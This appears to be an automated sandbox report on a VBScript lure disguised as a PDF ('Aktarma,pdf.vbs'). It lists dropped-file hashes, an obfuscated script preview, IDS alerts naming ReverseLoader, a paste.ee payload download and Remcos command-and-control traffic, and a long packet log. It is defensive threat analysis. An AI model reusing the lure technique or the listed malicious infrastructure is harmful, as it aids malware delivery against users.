                                                                                                                      SHA-256:BB291DD8CF522B4EF3E8FEB102DA5376B9F6A01E613325C365EF3ABFAF97D277
                                                                                                                      SHA-512:8A547C075E4643F6D4AF25776DF010E1D537F014511E6D69605BD5B8074D547DFBBFC902AEE5F4DB9FA382BD0700D9859477B0A4B88CA1E275A6BF919C11CC90
                                                                                                                      Malicious:false
                                                                                                                      Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):9434
                                                                                                                      Entropy (8bit):4.928515784730612
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                      MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                      SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                      SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                      SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                      Malicious:false
                                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):64
                                                                                                                      Entropy (8bit):1.1628158735648508
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Nllluldhz/lL:NllU
                                                                                                                      MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                                                      SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                                                      SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                                                                                      SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                                                                                      Malicious:false
                                                                                                                      Preview:@...e.................................L..............@..........

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a32j0lwm.w2c.ps1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yls3mn5v.w5b.psm1

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):60
                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                      Malicious:false
                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:JSON data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (3244), with CRLF line terminators
                                                                                                                      Entropy (8bit):3.793156429691965
                                                                                                                      TrID:
                                                                                                                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                                      • MP3 audio (1001/1) 32.22%
                                                                                                                      • Lumena CEL bitmap (63/63) 2.03%
                                                                                                                      • Corel Photo Paint (41/41) 1.32%
                                                                                                                      File name:Aktarma,pdf.vbs
                                                                                                                      File size:154'004 bytes
                                                                                                                      MD5:8c5cf018a9128cb2a9267ee3c4183a0c
                                                                                                                      SHA1:c0e11113ae0360e55302ceecbc7a356ed732ca18
                                                                                                                      SHA256:d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e
                                                                                                                      SHA512:7a826b11dc1fb0ca727ac5044a620b3db4108994bb4cdd353abfa6abdb9e598523d560a191fb1e42473c803a628f7052914d1c9124f09bbfe5fcdbf6154e5ada
                                                                                                                      SSDEEP:3072:NqHoOtSIAMD8oV8luoi9TKq/do5DvqHoOtSIAMD8oV8luoi9TKq/do50qHoOtSI2:NqpTD8LRiJKq/e57qpTD8LRiJKq/e50x
                                                                                                                      TLSH:BDE32F1238E67058E1E22F9396DD19F94F6BB529263D561DB8800F4F67D2E80CE427B3
                                                                                                                      File Content Preview:...... . . . .....d.P.q.h.G.d.c.c.j.s.H.i.z.R.n. .=. .".n.p.m.h.A.z.U.L.I.P.k.N.e.G.k.".....n.K.B.i.h.o.v.z.k.k.q.W.K.W.W. .=. .".B.h.W.O.r.p.W.a.k.K.W.K.t.W.q.".....N.k.R.W.W.z.B.W.W.e.i.b.d.W.P. .=. .".L.L.U.i.R.s.L.P.x.B.i.W.P.o.s.".........Z.K.G.h.z.c

                                                                                                                      File Icon

                                                                                                                      Icon Hash:68d69b8f86ab9a86

                                                                                                                      Network Behavior

                                                                                                                      Suricata IDS Alerts

                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-09T16:34:10.058334+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.649714TCP
                                                                                                                      2024-12-09T16:34:29.498194+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.649772172.67.187.200443TCP
                                                                                                                      2024-12-09T16:34:29.895976+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11172.67.187.200443192.168.2.649772TCP
                                                                                                                      2024-12-09T16:34:29.895976+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21172.67.187.200443192.168.2.649772TCP
                                                                                                                      2024-12-09T16:34:30.873229+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1172.67.187.200443192.168.2.649772TCP
                                                                                                                      2024-12-09T16:34:33.032018+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.64978345.80.158.3023101TCP
                                                                                                                      2024-12-09T16:34:35.733300+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.649790178.237.33.5080TCP

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 9, 2024 16:33:55.534849882 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:55.537817955 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:55.538002014 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:55.538111925 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:55.657116890 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:55.657258034 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:55.657349110 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:56.083477020 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:56.125761986 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:56.319690943 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:56.360114098 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:56.511291027 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:56.513942957 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:56.687263012 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:57.059642076 CET4434970720.198.119.143192.168.2.6
                                                                                                                      Dec 9, 2024 16:33:57.110141039 CET49707443192.168.2.620.198.119.143
                                                                                                                      Dec 9, 2024 16:33:57.407053947 CET49674443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:33:57.407059908 CET49673443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:33:57.735132933 CET49672443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:04.570096016 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:04.570142984 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:04.571230888 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:04.581351042 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:04.581371069 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:05.794193983 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:05.794291019 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:05.879635096 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:05.879652023 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:05.879904985 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:05.894700050 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:05.939326048 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.365869045 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.366364956 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.366415024 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.366434097 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.366556883 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.366590977 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.366619110 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.366624117 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.366663933 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.378880978 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.386769056 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.386821985 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.386846066 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.395232916 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.395267963 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.395283937 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.395306110 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.395349979 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.487479925 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.531964064 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.558128119 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.561912060 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.561968088 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.561991930 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.567749023 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.567806005 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.567828894 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.575158119 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.575215101 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.575239897 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.589992046 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.590045929 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.590070963 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.597433090 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.597486019 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.597491980 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.597505093 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.597557068 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.604926109 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.612329006 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.612389088 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.612411022 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.619838953 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.619895935 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.619925022 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.627352953 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.627410889 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.627427101 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.633253098 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.633301973 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.633325100 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.639482021 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.639535904 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.639553070 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.651456118 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.651515007 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.651532888 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.703840971 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.703867912 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.750165939 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.750230074 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.750246048 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.752340078 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.752399921 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.752407074 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.781987906 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782004118 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782020092 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782027006 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782030106 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782058001 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.782084942 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782111883 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.782118082 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.782136917 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.808851957 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.808866978 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.808885098 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.808892012 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.808938980 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.808952093 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.808962107 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.831810951 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.831856966 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.831872940 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.831886053 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.831901073 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.831918001 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.831942081 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.843504906 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.843539000 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.843565941 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.843573093 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.843633890 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.958466053 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.958482027 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.958515882 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.958543062 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.958561897 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.958592892 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.958610058 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.974735975 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.974750042 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.974817991 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.974847078 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.974975109 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.993092060 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.993118048 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.993164062 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:06.993174076 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:06.993223906 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.010842085 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.010863066 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.010911942 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.010936022 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.010963917 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.010978937 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.012711048 CET49674443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:07.016326904 CET49673443192.168.2.6173.222.162.64
                                                                                                                      Dec 9, 2024 16:34:07.026601076 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.026619911 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.026683092 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.026706934 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.026742935 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.045691967 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.045720100 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.045763016 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.045788050 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.045818090 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.045833111 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.137202978 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.137228966 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.137320042 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.137351990 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.137392998 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.149631023 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.149656057 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.149698973 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.149720907 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.149755001 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.149776936 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.162775993 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.162801027 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.162844896 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.162870884 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.162900925 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.162916899 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.174527884 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.174575090 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.174644947 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.174662113 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.174698114 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.185516119 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.185539007 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.185617924 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.185641050 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.185667992 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.185684919 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.196069002 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.196093082 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.196171999 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.196196079 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.196223021 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.196240902 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.206792116 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.206818104 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.206868887 CET49714443192.168.2.6151.101.1.137
                                                                                                                      Dec 9, 2024 16:34:07.206887007 CET44349714151.101.1.137192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:07.206917048 CET49714443192.168.2.6151.101.1.137
